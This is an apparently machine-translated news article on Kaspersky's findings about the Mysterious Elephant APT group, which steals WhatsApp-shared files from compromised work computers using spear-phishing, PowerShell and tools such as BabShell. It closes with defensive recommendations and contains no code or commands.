The popularity of WhatsApp As a means of sharing work information, it has facilitated communication and the exchange of documents between employees and organizations. However, this same tool has been become a growing target for sophisticated cyber threat groups that seek to extract confidential data from companies and institutions.
Kaspersky’s Global Research and Analysis Team (GReAT) detected a campaign orchestrated by the Mysterious Elephant group, classified as APT (Advanced Persistent Threat), which puts the security of institutional and government networks in check.
According to the investigation, the attackers do not directly violate WhatsApp’s infrastructure or its servers. Their approach is to compromise the computers that users use to access the applicationespecially those who use WhatsApp Desktop or the browser on work computers.
Once control of the device is taken, the Criminals locate and extract files that have been sent or received by the messaging serviceincluding documents, images and compressed data.
This type of leak goes far beyond data loss. Exposure of information outside corporate channels can trigger serious repercussions on the reputation of an organizationaffect its operational stability and harm its relationships with customers and partners.
In addition, attackers can remain undetected for long periods, accumulating documents, credentials and sensitive material shared in everyday applications such as WhatsApp or browsers. Experts warn that this scenario can lead to quantifiable economic losses and damage to trust. difficult to recover, especially when the leaked data is critical or confidential.
The method adopted by Mysterious Elephant reflects a change in targeted cybercrime tactics. According to Kaspersky, the group uses both proprietary tools and modified open source components, continually adapting its infrastructure to evade traditional detection mechanisms.
Initial access is achieved through techniques of social engineering: personalized emails, spear-phishing and infected documents capable of downloading malicious payloads when opened.
Once entry is obtained, attackers deploy a chain of tools that allows them to gain privileges, move between systems, and extract information without raising suspicion.
Among the detected resources, the use of PowerShell scripts stands out, a legitimate Windows utility that attackers turn into a means to execute commands and download additional software covertly. These scripts frequently communicate with remote servers controlled by criminalswhich guarantees persistent and hidden access.
One of the key pieces used by Mysterious Elephant is the BabShell tool, which establishes a direct remote connection between the affected computer and the attackers, allowing remote control of the machine.
Thanks to BabShell, cybercriminals collect basic system and user data, in addition to executing instructions or installing harmful programs. BabShell can also activate more sophisticated components, such as MemLoader HidenDesk, designed to execute malicious code directly in system memorywithout leaving traces on the disk and making the detection and elimination of the threat even more complex.
“The operation of this group is designed to go unnoticed and remain active even when attempts are made to stop it. Its infrastructure constantly changes, adapts quickly and makes it difficult for security teams to track it,” he explained. Fabio Assolinidirector of Research and Analysis for Latin America at Kaspersky.
Adding that the main threat lies not only in the theft of information, but in the loss of control and visibility over activities within the institutional digital environment.
With the increase in these attacks, Kaspersky specialists suggest adopting a comprehensive defense strategy to protect both information and devices:
1. Strengthen email protection and check suspicious messages: Most of these attacks start with fake emails and infected documents. Implementing anti-phishing filters and carefully analyzing links before opening any file is essential.
2. Protect equipment and limit the use of messaging: Keeping the software on all devices updated, avoiding the sharing of sensitive files outside of corporate channels and restricting the use of applications such as WhatsApp for confidential information are recommended measures.
3. Promote a safety culture: Regularly training staff allows you to identify social engineering attempts, deceptive emails and anomalous activities in the system. The human factor continues to be the first line of defense against the sophistication of these threats.
The daily use of WhatsApp for work matters must be accompanied by new security practicesboth technical and training. Ignoring risk can expose vital company information without users realizing it, putting operations, assets and reputation at risk.
